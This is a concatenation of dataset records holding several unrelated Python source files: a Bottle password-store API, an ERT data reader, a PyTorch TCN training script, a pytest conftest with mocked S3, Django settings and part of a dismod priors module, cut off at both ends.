isinstance(obj, UUID):\n return str(obj)\n if isinstance(obj, datetime):\n return obj.isoformat()\n return JSONEncoder.default(self, obj)\n\n# Takes a Category instance as argument.\ndef serialize_category(category):\n return dict(\n category_id = category.id,\n created = category.created,\n parent_id = category.parent_id,\n name = category.name\n )\n\n# Decorator to enable CORS\n@hook('after_request')\ndef enable_cors():\n # TODO: I would wish for this to be dynamic so it matches the method list\n # in the route decorator for each route. \n methods = ['GET', 'POST', 'UPDATE', 'DELETE', 'OPTIONS']\n response.add_header(\n 'Access-Control-Allow-Origin', \n config.get('api', 'allow-origin')\n )\n response.add_header(\n 'Access-Control-Allow-Methods', \n ','.join(methods)\n )\n response.add_header(\n 'Access-Control-Allow-Headers', \n 'X-Custom-Header'\n )\n\npsycopg2.extras.register_uuid()\ndb = psycopg2.connect(\n host = config.get('db', 'hostname'),\n port = config.get('db', 'port'),\n database = config.get('db', 'database'),\n user = config.get('db', 'username'),\n password = config.get('db', 'password')\n)\n\nk = KeepAss(db)\n\n# Fetch root categories\n@get('/categories')\ndef list_categories():\n _categories = []\n for category in k.categories():\n _categories.append(\n serialize_category(category)\n )\n if not len(_categories):\n response.status = 404\n return dumps(_categories, cls = LozEncoder)\n\n# Fetch category info\n# TODO: Perhaps write a custom filter for UUIDs in URLs\n@get('/category/')\n@get('/category//categories')\n@get('/category//entries')\n@post('/category')\n@post('/category//add_category')\n@route('/category/', method='UPDATE')\n@route('/category/', method='DELETE')\ndef category(category_id=None):\n parent_category_id = None\n\n # First make an uuid if the method is POST.\n if request.method == 'POST' and not category_id:\n new_category_uuid = uuid4()\n category_id = new_category_uuid\n parent_category_id = request.params.get('parent_id', None)\n auto_create = True\n elif request.method == 'POST' and category_id:\n # This is for adding child categories under a parent\n new_category_uuid = uuid4()\n try:\n parent_category = Category(\n db,\n category_id = category_id\n )\n except Exception as e:\n response.status = 404\n return dumps(dict(\n error = 'not found',\n message = str(e)\n ))\n parent_category_id = parent_category.id\n category_id = new_category_uuid\n auto_create = True\n elif request.method == 'UPDATE' and category_id:\n category = Category(\n db,\n category_id = category_id\n )\n try:\n category.parent_id = request.params.get('parent_id', None)\n category.name = request.params.get('name', 'No name')\n except Exception as e:\n response.status = 500\n return dumps(dict(\n error = 'category not updated',\n message = str(e)\n ))\n\n response.status = 200\n return dumps(dict(message = 'category updated'))\n elif request.method == 'DELETE' and category_id:\n try:\n k.remove_category(category_id)\n except Exception as e:\n response.status = 500\n return dumps(dict(\n error = 'could not delete category',\n message = str(e)\n ))\n return dumps(dict(\n message = 'category and all sub-categories were deleted'\n ))\n else:\n auto_create = False\n\n basename = request.path.split('/')[-1]\n\n # Now we can use the UUID to either create a category or fetch an existing\n try:\n c = Category(\n db, \n category_id = category_id,\n parent_id = parent_category_id,\n name = request.params.get('name', 'No name'),\n auto_create = auto_create\n )\n except Exception as e:\n response.status = 404\n return dumps(dict(error = 'not found'))\n\n if basename == 'categories':\n _categories = []\n for category in c.categories():\n _categories.append(\n serialize_category(category)\n )\n if not len(_categories):\n response.status = 404\n return dumps(_categories, cls = LozEncoder)\n elif basename == 'entries':\n _entries = []\n for entry in c.entries():\n # This only returns unencrypted information\n _entries.append(dict(\n entry_id = entry.id,\n title = entry.title,\n created = entry.created\n ))\n if not len(_entries):\n response.status = 404\n return dumps(_entries, cls = LozEncoder)\n else:\n return dumps(serialize_category(c), cls = LozEncoder)\n\n# List all entries\n@get('/entries')\ndef list_entries():\n _entries = []\n for entry in k.entries():\n _entries.append(dict(\n entry_id = entry.id,\n title = entry.title,\n created = entry.created,\n category_id = entry.category_id\n ))\n if not len(_entries):\n response.status = 404\n return dumps(_entries, cls = LozEncoder)\n\n# Fetch entry info\n@get('/entry/')\n@post('/entry')\ndef entry(entry_id=None):\n # Init empty variables for encrypted data\n req_notes = ''\n req_username = ''\n req_password = ''\n\n # First handle POST requests\n if request.method == 'POST':\n # Generate new uuid for entry\n new_entry_uuid = uuid4()\n entry_id = new_entry_uuid\n auto_create = True\n\n # Encrypt values for new entry creation\n with Encrypt(\n salt = config.get('keep', 'salt'),\n passphrase = config.get('keep', 'passphrase')\n ) as e:\n req_notes = e.encrypt(request.params.get('notes', ''))\n req_username = e.encrypt(request.params.get('username', ''))\n req_password = e.encrypt(request.params.get('password', ''))\n else:\n auto_create = False\n entry_id = UUID(entry_id)\n\n # This creates the Entry with the previously generated UUID as id, unless \n # it exists in DB already. \n try:\n entry = Entry(\n db, \n entry_id = entry_id,\n # The rest of the arguments are only for POST method\n auto_create = auto_create,\n category_id = None,\n title = request.params.get('title', 'No title'),\n notes = buffer(req_notes),\n username = buffer(req_username),\n url = request.params.get('url', ''),\n password = buffer(req_password)\n )\n except Exception as e:\n if request.method == 'POST':\n response.status = 500\n return dumps(dict(\n error = 'not created',\n message = str(e)\n ))\n else:\n response.status = 404\n return dumps(dict(\n error = 'not found',\n message = str(e)\n ))\n\n # Decrypt values again\n with Encrypt(\n salt = config.get('keep', 'salt'),\n passphrase = config.get('keep', 'passphrase')\n ) as e:\n return dumps(dict(\n entry_id = entry.id,\n created = entry.created,\n category_id = entry.category_id,\n title = entry.title,\n notes = e.decrypt(entry.notes),\n username = e.decrypt(entry.username),\n url = entry.url,\n password = e.decrypt(entry.password)\n ), cls = LozEncoder)\n\nif __name__ == '__main__':\n run(\n host = config.get('api', 'host'),\n port = config.get('api', 'port')\n )\n debug(config.get('api', 'debug'))\nelse:\n application = default_app()\n","sub_path":"webapi.py","file_name":"webapi.py","file_ext":"py","file_size_in_byte":8861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"281999536","text":"__author__ = '531767'\n\nimport re\nimport os\nimport pandas as pd\n\ndef read_mertpd_txt(file):\n (head, filename) = os.path.split(file)\n print('Reading ' + filename)\n data = pd.read_csv(file, sep='\\t', index_col=0, header=0)\n return data\n\nif __name__ == '__main__':\n\n files = []\n files.append('C:/Users\\Arno\\Documents\\ERT_LORETTE\\RCH\\\\1_DIP_48_a3_n10_Pro_20150223_000002.txt')\n data = read_mertpd_txt(files[0])\n print(data['Tx Bat'])","sub_path":"ReadErtData/read_mertpd_txt.py","file_name":"read_mertpd_txt.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"582090982","text":"import torch.optim as optim\nimport sys\nsys.path.append(\"../../\")\nfrom tcn import TCN\nimport argparse\nfrom utils.biuld_dataset import *\nfrom utils.util import *\nfrom utils.pytool import EarlyStopping\nimport pandas as pd\nfrom torch.utils.data import DataLoader, TensorDataset\nimport time\nimport matplotlib.pyplot as plt\nfrom sklearn import preprocessing\nimport torch\nfrom torch.utils.data import DataLoader\n# writer就相当于一个日志,保存你要做图的所有信息。第二句就是在你的项目目录下建立一个文件夹log,存放画图用的文件。刚开始的时候是空的\nfrom tensorboardX import SummaryWriter\nwriter = SummaryWriter('log') # 建立一个保存数据用的东西\n\n######Globle variable#####\nsteps = 0\n\n# ----------------------------------#\n# config #\n# ----------------------------------#\nparser = argparse.ArgumentParser(description='Sequence Modeling - (Permuted) Sequential SATCN')\nparser.add_argument('--batch_size', type=int, default=64, metavar='N', help='batch size (default: 64)')\nparser.add_argument('--cuda', action='store_false', help='use CUDA (default: True)')\nparser.add_argument('--dropout', type=float, default=0.05, help='dropout applied to layers (default: 0.05)')\nparser.add_argument('--clip', type=float, default=-1, help='gradient clip, -1 means no clip (default: -1)')\nparser.add_argument('--epochs', type=int, default=100, help='upper epoch limit (default: 20)')\nparser.add_argument('--ksize', type=int, default=7, help='kernel size (default: 7)')\nparser.add_argument('--levels', type=int, default=8, help='# of levels (default: 8)')\nparser.add_argument('--log-interval', type=int, default=100, metavar='N', help='report interval (default: 100')\nparser.add_argument('--lr', type=float, default=1e-4, help='initial learning rate (default: 2e-3)')\nparser.add_argument('--optim', type=str, default='Adam', help='optimizer to use (default: Adam)')\nparser.add_argument('--nhid', type=int, default=10, help='number of hidden units per layer (default: 25)')\nparser.add_argument('--nclass', type=int, default=1, help='size of the output (default: 1)')\nparser.add_argument('--seed', type=int, default=1111, help='random seed (default: 1111)')\nparser.add_argument('--permute', action='store_true', help='use permuted MNIST (default: false)')\nparser.add_argument('--stft', type=bool, default=True, help='Embedding STFT (default: True)')\nparser.add_argument('--train_start_time', type=str, default='2018-07-01', help='Start time of train(default: 2018-07-01)')\nparser.add_argument('--train_end_time', type=str, default='2018-07-01', help='End time of train DS(default: 2018-07-09)')\nparser.add_argument('--test_start_time', type=str, default='2018-07-10', help='Start time of test(default: 2018-07-01)')\nparser.add_argument('--test_end_time', type=str, default='2018-07-10', help='End time of test DS(default: 2018-07-10)')\nargs = parser.parse_args()\n\ntorch.manual_seed(args.seed)\nif torch.cuda.is_available():\n if not args.cuda:\n print(\"WARNING: You have a CUDA device, so you should probably run with --cuda\")\n\nprint(args)\n\n# ----------------------------------#\n# load dataset #\n# ----------------------------------#\ndataset = pd.read_parquet(\"./data/HD04/TB020_2018_train_normal.parquet\",\n columns=['x方向振动值', '机舱气象站风速', '轮毂转速', '叶片1角度', '5秒偏航对风平均值', '变频器发电机侧功率'])\ndataset_train = dataset[args.train_start_time : args.train_end_time]\ndataset_test = dataset[args.test_start_time : args.test_end_time]\n\nlable_1hz = np.array(dataset_train[\"x方向振动值\"]).reshape(-1, 1)\n\npd.DataFrame(dataset_train, columns=dataset_train.columns.values).to_parquet('./data/HD04/TB020_train_normal_fornormalizer.parquet')\ndataset_normalizer = preprocessing.StandardScaler().fit(dataset_train)\ndataset_train = dataset_normalizer.transform(dataset_train)\ndataset_test = dataset_normalizer.transform(dataset_test)\n\npd.DataFrame(lable_1hz, columns=['label']).to_parquet('./data/HD04/TB020_train_label_fornormalizer.parquet')\ny_train_normalizer = preprocessing.StandardScaler().fit(lable_1hz)\nlable_normal_1hz = y_train_normalizer.transform(lable_1hz)\n\nx_train, y_train, x_val, y_val = data_prepare(dataset_train, args.stft)\nn_fearture = x_train.shape[2]\n\nx_test, y_test = multivariate_data(dataset_test, dataset_test[:, 0],\n 0, None, past_history,\n future_target, STEP,\n single_step=True,\n stft_flag=args.stft)\n\n# ----------------------------------#\n# creating the dataset #\n# ----------------------------------#\ntrainset = TensorDataset(torch.tensor(x_train, dtype=torch.float), torch.tensor(y_train, dtype=torch.float))\nvalset = TensorDataset(torch.tensor(x_val, dtype=torch.float), torch.tensor(y_val, dtype=torch.float))\ntestset = TensorDataset(torch.tensor(x_test, dtype=torch.float), torch.tensor(y_test, dtype=torch.float))\n\n# creating the dataloader\ntrain_loader = DataLoader(trainset, batch_size=args.batch_size, shuffle=True)\nsize_data, seq_length, nb_feature = x_train.shape\n\nval_loader = DataLoader(valset, batch_size=args.batch_size, shuffle=True)\ntest_loader = DataLoader(testset, batch_size=args.batch_size, shuffle=False)\n\n# ----------------------------------#\n# model #\n# ----------------------------------#\npermute = torch.Tensor(np.random.permutation(60).astype(np.float64)).long()\nchannel_sizes = [args.nhid] * args.levels\n\nmodel = TCN(n_fearture, args.nclass, channel_sizes, kernel_size=args.ksize, dropout=args.dropout)\nif args.cuda:\n model.cuda()\n permute = permute.cuda()\n\nlr = args.lr\noptimizer = getattr(optim, args.optim)(model.parameters(), lr=lr)\n\ndef train(ep):\n global steps\n train_loss = 0\n model.train()\n criterion = torch.nn.MSELoss()\n\n start_time = time.time()\n for batch_idx, (data, target) in enumerate(train_loader):\n if args.cuda:\n data, target = data.cuda(), target.cuda()\n data = data.permute(0, 2, 1)\n if args.permute:\n data = data[:, :, permute]\n optimizer.zero_grad()\n output = model(data)\n loss = criterion(output, target)\n loss.backward()\n if args.clip > 0:\n torch.nn.utils.clip_grad_norm_(model.parameters(), args.clip)\n optimizer.step()\n train_loss += loss.item()\n steps += seq_length\n\n if batch_idx > 0 and batch_idx % args.log_interval == 0:\n print('\\r', '\\tTrain Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}\\tSteps: {}'.format(\n ep, batch_idx * args.batch_size, len(train_loader.dataset),\n 100. * batch_idx / len(train_loader), loss.item(), steps), sep='', end='', flush=True)\n\n train_loss /= batch_idx\n end_time = time.time()\n print('Train set: Average loss: {:.6f}\\ttime cost: {:.6f}'.format(train_loss,start_time-end_time))\n return train_loss\n\ndef val():\n model.eval()\n test_loss = 0\n criterion = torch.nn.MSELoss()\n batch_idx = 0\n\n with torch.no_grad():\n for data, target in val_loader:\n if args.cuda:\n data, target = data.cuda(), target.cuda()\n data = data.permute(0, 2, 1)\n # data = data.view(-1, input_channels, seq_length)\n if args.permute:\n data = data[:, :, permute]\n output = model(data)\n loss = criterion(output, target)\n test_loss += loss\n batch_idx += 1\n\n test_loss /= batch_idx\n print('Val set: Average loss: {:.6f}'.format(test_loss))\n return test_loss\n\ndef predict(data_loader, model):\n model.eval()\n pridict_loss = 0\n criterion = torch.nn.MSELoss()\n batch_idx = 0\n pridict_output = []\n target_input = []\n total_loss = []\n\n with torch.no_grad():\n for data, target in data_loader:\n if args.cuda:\n data, target = data.cuda(), target.cuda()\n data = data.permute(0, 2, 1)\n # data = data.view(-1, input_channels, seq_length)\n if args.permute:\n data = data[:, :, permute]\n output = model(data)\n # pridict_output.append(output)\n\n pridict_output.append(output)\n target_input.append(target)\n\n loss = criterion(output, target)\n total_loss.append(loss.unsqueeze(-1))\n pridict_loss += loss\n batch_idx += 1\n\n pridict_loss /= batch_idx\n print('Pridict set: Average loss: {:.6f}'.format(pridict_loss))\n return pridict_loss, total_loss, pridict_output, target_input\n\ndef realtime_predict(data,model):\n model.eval()\n with torch.no_grad():\n if args.cuda:\n data = data.cuda()\n data = data.permute(0, 2, 1)\n # data = data.view(-1, input_channels, seq_length)\n if args.permute:\n data = data[:, :, permute]\n output = model(data)\n return output\n\nif __name__ == \"__main__\":\n # EarlyStopping\n early_stopping = EarlyStopping(patience=10, verbose=True, delta=0.000001, store_path='./models')\n train_loss_list = []\n val_loss_list = []\n\n for epoch in range(1, args.epochs + 1):\n train_loss = train(epoch)\n train_loss_list.append(train_loss)\n val_loss = val()\n val_loss_list.append(val_loss)\n\n if epoch % 10 == 0:\n lr /= 5\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n\n early_stopping(val_loss, model)\n if early_stopping.early_stop:\n print('Early stopping')\n break\n\n mdhms = time.strftime('%d%H%M', time.localtime(time.time()))\n plt.figure(0, figsize=(10, 6))\n plt.title('Train and Val loss')\n plt.plot(train_loss_list, color='blue', label='train_loss', linewidth=2)\n plt.plot(val_loss_list, color='yellow', label='test_loss', linewidth=2)\n plt.savefig(\"./figure\" + '/loss_' + mdhms + '.png')\n\n pridict_loss, total_loss, pridict_output, target_input = predict(test_loader, model)\n test_out_val = torch.cat(pridict_output, dim=0).cpu().detach().numpy()\n test_Y_val = torch.cat(target_input, dim=0).cpu().detach().numpy()\n\n # Metrics\n print('Test dataset result:')\n # 输出在训练集上的R^2\n metrics_calculate(test_Y_val, test_out_val)\n print(\"在测试集上的R^2:\", r2_score(test_Y_val, test_out_val))\n\n out_val_raw = y_train_normalizer.inverse_transform(test_out_val.reshape(-1,1))\n Y_val_raw = y_train_normalizer.inverse_transform(test_Y_val.reshape(-1, 1))\n\n print('Test raw dataset result:')\n # 输出在训练集上的R^2\n metrics_calculate(out_val_raw, Y_val_raw)\n print(\"在测试集上的R^2:\", r2_score(out_val_raw, Y_val_raw))\n\n res = out_val_raw - Y_val_raw\n\n plt.figure(1, figsize=(10, 6))\n plt.subplot(311)\n plt.title('Normalized dataset')\n plt.plot(pd.DataFrame(test_Y_val), color='blue', label='lable', linewidth=2)\n plt.plot(pd.DataFrame(test_out_val), color='yellow', label='predict', linewidth=2)\n plt.legend()\n\n plt.subplot(312)\n plt.title('Raw dataset')\n plt.plot(pd.DataFrame(Y_val_raw), color='blue', label='lable', linewidth=2)\n plt.plot(pd.DataFrame(out_val_raw), color='yellow', label='predict', linewidth=2)\n plt.legend()\n\n plt.subplot(313)\n plt.title('Residual')\n plt.plot(res, color='blue', label='res', linewidth=2)\n plt.plot(pd.DataFrame(abs(res)).rolling(30).mean(), color='yellow', label='res_mean', linewidth=2)\n plt.legend()\n\n plt.savefig(\"./figure\" + '/val_res_' + mdhms + '.png')\n plt.show()\n","sub_path":"train_main.py","file_name":"train_main.py","file_ext":"py","file_size_in_byte":11737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"566870242","text":"\n\nfrom xai.brain.wordbase.nouns._pluperfect import _PLUPERFECT\n\n#calss header\nclass _PLUPERFECTS(_PLUPERFECT, ):\n\tdef __init__(self,): \n\t\t_PLUPERFECT.__init__(self)\n\t\tself.name = \"PLUPERFECTS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"pluperfect\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_pluperfects.py","file_name":"_pluperfects.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"510076148","text":"\"\"\"This file contains global test fixtures.\n\nThe location of this file also allows pytest to determine what packages\nshould be added to path for use within test files.\n\"\"\"\nimport logging\nimport os\nfrom pathlib import Path\n\nimport pytest\nimport requests\nfrom _pytest.monkeypatch import MonkeyPatch\n\nfrom dag.utils.aws.s3 import get_client\n\nTHIS_FILE = Path(__file__).resolve()\nROOT_DIR = THIS_FILE.parent\n\nENV = os.environ\n# do not set AIRFLOW_HOME in order to avoid littering repo with\n# files that airflow creates automatically\nENV['AIRFLOW__CORE__DAGS_FOLDER'] = str(ROOT_DIR.joinpath('dags'))\n\nTEST_FERNET_KEY = 'TRSq95QF5Pj9ldN002l0GgLX3ze-d92ZSZAmz3pd4wY='\nENV['FERNET_KEY'] = TEST_FERNET_KEY\nENV['PII_FERNET_KEY'] = TEST_FERNET_KEY\nENV['PII_SALT'] = 'pepper'\n\n# prevent using real account just in case\nENV['AWS_ACCESS_KEY_ID'] = 'testing'\nENV['AWS_SECRET_ACCESS_KEY'] = 'testing'\nENV['AWS_SECURITY_TOKEN'] = 'testing'\nENV['AWS_SESSION_TOKEN'] = 'testing'\n\n\n@pytest.fixture(scope='session')\ndef monkeysession():\n \"\"\"Patch to use monkeypatch with session-scoped fixtures.\n\n Use `monkeypatch` instead for function scoped fixtures.\n \"\"\"\n m = MonkeyPatch()\n yield m\n m.undo()\n\n\n@pytest.fixture(scope='module')\ndef monkeymodule():\n \"\"\"Patch to use monkeypatch with module-scoped fixtures.\n\n Use `monkeypatch` instead for function scoped fixtures.\n \"\"\"\n m = MonkeyPatch()\n yield m\n m.undo()\n\n\n@pytest.fixture(scope='session')\ndef this_repo():\n \"\"\"Get the root directory path for this repo.\"\"\"\n return ROOT_DIR\n\n\n@pytest.fixture(scope='session')\ndef dagbag(monkeysession):\n \"\"\"Return a dagbag object from airflow.\"\"\"\n # perform airflow imports here so envvar changed first\n from airflow import settings\n from airflow.models import DagBag\n\n # prevent loading old dag repo policy in airflow_local_settings\n monkeysession.setattr(settings, 'policy', lambda task_instance: None)\n return DagBag(include_examples=False)\n\n\n@pytest.fixture\ndef disable_airflow_logger():\n \"\"\"Prevent overly verbose logs from showing when a test fails.\n\n This is best used when several errors are caught, but are still\n logged like in test_validation.py\n \"\"\"\n logger = logging.getLogger('airflow.task')\n logger.disabled = True\n yield\n logger.disabled = False\n\n\n@pytest.fixture\ndef populate_s3():\n \"\"\"Populate s3 files in the mocked aws.\n\n We are using moto directly here instead of going through localstack\n since going over api is too slow and using the localstack infra\n directly requires dealing with npm.\n \"\"\"\n\n def populate(*paths):\n \"\"\"Populate s3 files for passed paths.\n\n If no paths are passed then populates all files.\n \"\"\"\n client = get_client()\n created_buckets = set()\n\n included_paths = [Path(i) for i in paths]\n path = ROOT_DIR.joinpath('tests', 'fixtures', 's3')\n for f in path.rglob('*'):\n relative_path = f.relative_to(path)\n if included_paths and not any(\n p in relative_path.parents or p == relative_path for p in included_paths\n ):\n continue\n bucket, *key = relative_path.parts\n if bucket not in created_buckets:\n client.create_bucket(Bucket=bucket)\n created_buckets.add(bucket)\n if f.is_file():\n client.upload_file(\n Bucket=bucket,\n Filename=str(f.resolve()),\n Key='/'.join(key),\n ExtraArgs={'ServerSideEncryption': 'AES256'},\n )\n\n if os.getenv('MOTO_SERVER_ENABLED'):\n # using moto server, the tests using aws fixtures run slower, but\n # the test suite overall loads faster\n endpoint_url = os.getenv('AWS_ENDPOINT_URL')\n requests.post(f\"{endpoint_url}/moto-api/reset\")\n yield populate\n else:\n # import moto here since import has significant overhead which we dont\n # need when automatically rerunning tests in test.sh\n from moto import mock_s3\n\n mock = mock_s3()\n mock.start()\n yield populate\n mock.stop()\n\n\n@pytest.fixture\ndef mock_anonymizer(monkeypatch):\n response = None\n\n def set_response(value):\n nonlocal response\n response = value\n\n def patch(*args, **kwargs):\n class Response:\n status_code = '200'\n\n def json(self):\n return response\n\n return Response()\n\n from airflow.hooks.http_hook import HttpHook\n\n monkeypatch.setattr(HttpHook, 'run', patch)\n return set_response\n","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":4636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"214462498","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nDjango settings for blog project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/dev/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/dev/ref/settings/\n\"\"\"\n\nimport environ\n\nBASE_DIR = environ.Path(__file__) - 3 # (/a/b/myfile.py - 3 = /)\nAPPS_DIR = BASE_DIR.path('blog')\n\nenv = environ.Env()\nenviron.Env.read_env('.env')\n\n# APP CONFIGURATION\n# ******************************************************************************\n\n# DEBUG\n# https://docs.djangoproject.com/en/dev/ref/settings/#debug\n# ------------------------------------------------------------------------------\nDEBUG = env.bool('DJANGO_DEBUG', False)\n\nINSTALLED_APPS = (\n\n # Default Django apps:\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.sites',\n 'django.contrib.sitemaps',\n\n # Admin:\n 'django.contrib.admin',\n\n # Fake admin\n 'admin_honeypot',\n\n # Specific apps\n 'blog.core',\n 'blog.blog',\n\n # Healthchecks\n 'health_check',\n 'health_check.db',\n 'health_check.cache',\n 'health_check.storage',\n\n)\n\n# DATABASE CONFIGURATION\n# https://docs.djangoproject.com/en/dev/ref/settings/#databases\n# ------------------------------------------------------------------------------\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql',\n 'NAME': env('POSTGRES_DB', default=''),\n 'USER': env('POSTGRES_USER', default=''),\n 'PASSWORD': env('POSTGRES_PASSWORD', default=''),\n 'HOST': env('POSTGRES_HOST', default='localhost'),\n 'PORT': env('POSTGRES_PORT', default='5432'),\n 'CONN_MAX_AGE': env.int('DATABASE_CONN_MAX_AGE', default=300),\n }\n}\n\n# ADMIN CONFIGURATION\n# ------------------------------------------------------------------------------\nADMIN_URL = env('DJANGO_ADMIN_URL', default='realadmin/')\n\n# URL CONFIGURATION\n# ------------------------------------------------------------------------------\nROOT_URLCONF = 'config.urls'\n\n# WSGI CONFIGURATION\n# https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application\n# ------------------------------------------------------------------------------\nWSGI_APPLICATION = 'config.wsgi.application'\n\n# EMAIL CONFIGURATION\n# ------------------------------------------------------------------------------\nEMAIL_BACKEND = env(\n 'DJANGO_EMAIL_BACKEND',\n default='django.core.mail.backends.smtp.EmailBackend'\n)\nTO_DEFAULT_EMAIL = env('TO_DEFAULT_EMAIL', default='default@default.com')\n\n# GENERAL CONFIGURATION\n# ------------------------------------------------------------------------------\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\nTIME_ZONE = 'Europe/Madrid'\n\n# https://docs.djangoproject.com/en/dev/ref/settings/#language-code\nLANGUAGE_CODE = 'en-en'\n\n# https://docs.djangoproject.com/en/dev/ref/settings/#site-id\nSITE_ID = 1\n\n# https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n\nUSE_I18N = True\n\n# https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n\nUSE_L10N = True\n\n# https://docs.djangoproject.com/en/dev/ref/settings/#use-tz\nUSE_TZ = True\n\nDATE_INPUT_FORMATS = ('%d-%m-%Y',)\nDATE_FORMAT = '%d-%m-%Y'\n\n# MIDDLEWARE CONFIGURATION\n# https://docs.djangoproject.com/en/dev/topics/http/middleware/\n# ------------------------------------------------------------------------------\nMIDDLEWARE = (\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\n# TEMPLATE CONFIGURATION\n# https://docs.djangoproject.com/en/dev/ref/settings/#templates\n# ------------------------------------------------------------------------------\nTEMPLATES = [\n {\n # https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-TEMPLATES-BACKEND\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n # https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs\n 'DIRS': [\n str(APPS_DIR.path('templates')),\n ],\n 'OPTIONS': {\n # https://docs.djangoproject.com/en/dev/ref/settings/#template-debug\n 'debug': DEBUG,\n # https://docs.djangoproject.com/en/dev/ref/settings/#template-loaders\n # https://docs.djangoproject.com/en/dev/ref/templates/api/#loader-types\n 'loaders': [\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n ],\n # https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.template.context_processors.i18n',\n 'django.template.context_processors.media',\n 'django.template.context_processors.static',\n 'django.template.context_processors.tz',\n 'django.contrib.messages.context_processors.messages',\n 'blog.core.context_processors.common',\n ],\n },\n },\n]\n\n# STATIC FILES CONFIGURATION\n# https://docs.djangoproject.com/en/dev/ref/settings/#static-root\n# ------------------------------------------------------------------------------\nSTATIC_ROOT = str(BASE_DIR('staticfiles'))\n\n# https://docs.djangoproject.com/en/dev/ref/settings/#static-url\nSTATIC_URL = '/static/'\n\n# https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS\nSTATICFILES_DIRS = (\n str(APPS_DIR.path('static')),\n)\n\n# https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\n\n# THIRD PARTY APPLICATIONS\n# ******************************************************************************\n\n# Google reCAPTCHA\n# ------------------------------------------------------------------------------\nRECAPTCHA_SITE_KEY = env('RECAPTCHA_SITE_KEY', default='')\nRECAPTCHA_SECRET_KEY = env('RECAPTCHA_SECRET_KEY', default='')\nRECAPTCHA_URL = 'https://www.google.com/recaptcha/api/siteverify'\n\n# Google Analytics\n# ------------------------------------------------------------------------------\nGA_MEASUREMENT_ID = env('GA_MEASUREMENT_ID', default='')\n","sub_path":"config/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":6820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"542487438","text":"import itertools as it\nimport numpy as np\n\nfrom cascade.core.log import getLoggers\n\nCODELOG, MATHLOG = getLoggers(__name__)\n\n\ndef grids_to_set_priors(model, var):\n \"\"\"Iterate over common parts of a DismodGroups object.\"\"\"\n for group_name, group in model.items():\n if group_name not in var or group_name == \"random_effect\":\n continue\n\n for key, prior_grid in group.items():\n if key not in var[group_name]:\n continue\n\n yield group_name, key, prior_grid\n\n\ndef set_priors_from_draws(model, draws):\n \"\"\"Sets priors from posteriors of the *same model*.\n Use this when you have fit fixed and then want to fit again for both.\n\n Args:\n model (Model): A complete model for this location. It will be modified.\n draws (List[DismodGroups]): A list of fits to this location.\n \"\"\"\n if draws is None:\n return\n\n if len(draws) == 0:\n return\n\n for group_name, key, prior_grid in grids_to_set_priors(model, draws[0]):\n ages = prior_grid.ages\n times = prior_grid.times\n grid_draws = DrawFunction(draws, group_name, key)\n draw_value, draw_dage, draw_dtime = gather_draws_for_grid(grid_draws, ages, times)\n\n estimate_grid_parameters(prior_grid.value, draw_value, ages, times)\n estimate_grid_parameters(prior_grid.dage, draw_dage, ages[:-1], times)\n estimate_grid_parameters(prior_grid.dtime, draw_dtime, ages, times[:-1])\n\n\ndef set_priors_from_parent_draws(model, draws):\n \"\"\"Sets priors from posteriors of the *parent model*.\n\n Args:\n model (Model): A complete model for this location. It will be modified.\n draws (List[DismodGroups]): A list of fits to the parent of this location.\n \"\"\"\n if draws is None:\n return\n\n assert len(draws) > 0\n\n for group_name, key, prior_grid in grids_to_set_priors(model, draws[0]):\n ages = prior_grid.ages\n times = prior_grid.times\n # This model's location_id is one of the children for the draws.\n if group_name == \"rate\" and (key, model.location_id) in draws[0][\"random_effect\"]:\n grid_draws = RandomEffectDrawFunction(draws, group_name, key, model.location_id)\n draw_value, draw_dage, draw_dtime = gather_draws_for_grid(grid_draws, ages, times)\n CODELOG.debug(f\"Child prior found for {group_name} {key}\")\n elif group_name != \"rate\":\n grid_draws = DrawFunction(draws, group_name, key)\n draw_value, draw_dage, draw_dtime = gather_draws_for_grid(grid_draws, 